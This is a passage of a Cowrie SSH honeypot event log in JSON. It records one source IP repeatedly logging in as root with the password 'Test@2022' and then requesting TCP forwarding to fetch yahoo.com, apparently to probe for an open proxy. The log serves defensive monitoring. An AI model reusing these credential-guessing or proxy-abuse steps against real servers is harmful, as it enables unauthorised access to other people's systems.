istp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.570404Z","src_ip":"213.209.150.239","session":"ced5a7a210cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.852190Z","src_ip":"213.209.150.239","session":"ced5a7a210cd"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.890285Z","src_ip":"45.88.8.186","session":"832545f3f8ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":20663,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20663","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.910287Z","session":"ced5a7a210cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:13.967093Z","src_ip":"213.209.150.239","session":"ced5a7a210cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":7801,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7801","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.123109Z","session":"ced5a7a210cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.179775Z","src_ip":"213.209.150.239","session":"ced5a7a210cd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.237140Z","src_ip":"213.209.150.239","session":"ced5a7a210cd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7751,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3f5c1c814e3","protocol":"ssh","message":"New connection: 213.209.150.239:7751 (1.2.3.4:22) [session: d3f5c1c814e3]","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.283472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.284273Z","src_ip":"213.209.150.239","session":"d3f5c1c814e3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.331724Z","src_ip":"213.209.150.239","session":"d3f5c1c814e3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.566500Z","src_ip":"213.209.150.239","session":"d3f5c1c814e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26755,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26755","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.614697Z","session":"d3f5c1c814e3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.662191Z","src_ip":"213.209.150.239","session":"d3f5c1c814e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":16230,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16230","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.797480Z","session":"d3f5c1c814e3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.845083Z","src_ip":"213.209.150.239","session":"d3f5c1c814e3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.893191Z","src_ip":"213.209.150.239","session":"d3f5c1c814e3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7789,"dst_ip":"1.2.3.4","dst_port":22,"session":"6000783c7c09","protocol":"ssh","message":"New connection: 213.209.150.239:7789 (1.2.3.4:22) [session: 6000783c7c09]","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.948906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:14.949641Z","src_ip":"213.209.150.239","session":"6000783c7c09"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.006705Z","src_ip":"213.209.150.239","session":"6000783c7c09"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.289860Z","src_ip":"213.209.150.239","session":"6000783c7c09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":3762,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3762","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.348009Z","session":"6000783c7c09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.404964Z","src_ip":"213.209.150.239","session":"6000783c7c09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18555,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18555","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.559426Z","session":"6000783c7c09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.617095Z","src_ip":"213.209.150.239","session":"6000783c7c09"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.675030Z","src_ip":"213.209.150.239","session":"6000783c7c09"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7834,"dst_ip":"1.2.3.4","dst_port":22,"session":"12a8817e60c7","protocol":"ssh","message":"New connection: 213.209.150.239:7834 (1.2.3.4:22) [session: 12a8817e60c7]","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.720958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.721948Z","src_ip":"213.209.150.239","session":"12a8817e60c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:15.768954Z","src_ip":"213.209.150.239","session":"12a8817e60c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.004147Z","src_ip":"213.209.150.239","session":"12a8817e60c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":2619,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:2619","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.052125Z","session":"12a8817e60c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.100911Z","src_ip":"213.209.150.239","session":"12a8817e60c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28031,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28031","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.237489Z","session":"12a8817e60c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.284649Z","src_ip":"213.209.150.239","session":"12a8817e60c7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.332688Z","src_ip":"213.209.150.239","session":"12a8817e60c7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7882,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f7538b6d6ec","protocol":"ssh","message":"New connection: 213.209.150.239:7882 (1.2.3.4:22) [session: 8f7538b6d6ec]","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.378861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.379811Z","src_ip":"213.209.150.239","session":"8f7538b6d6ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.426770Z","src_ip":"213.209.150.239","session":"8f7538b6d6ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.664128Z","src_ip":"213.209.150.239","session":"8f7538b6d6ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":2883,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:2883","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.712768Z","session":"8f7538b6d6ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.760097Z","src_ip":"213.209.150.239","session":"8f7538b6d6ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":12012,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12012","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.897599Z","session":"8f7538b6d6ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.945001Z","src_ip":"213.209.150.239","session":"8f7538b6d6ec"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:16.992896Z","src_ip":"213.209.150.239","session":"8f7538b6d6ec"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7922,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fc666d47620","protocol":"ssh","message":"New connection: 213.209.150.239:7922 (1.2.3.4:22) [session: 7fc666d47620]","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.048584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.049576Z","src_ip":"213.209.150.239","session":"7fc666d47620"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.106224Z","src_ip":"213.209.150.239","session":"7fc666d47620"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.389004Z","src_ip":"213.209.150.239","session":"7fc666d47620"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24118,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24118","sensor":"my-vps","timestamp":"2025-08-26T01:00:17.447094Z","session":"7fc666d47620"}
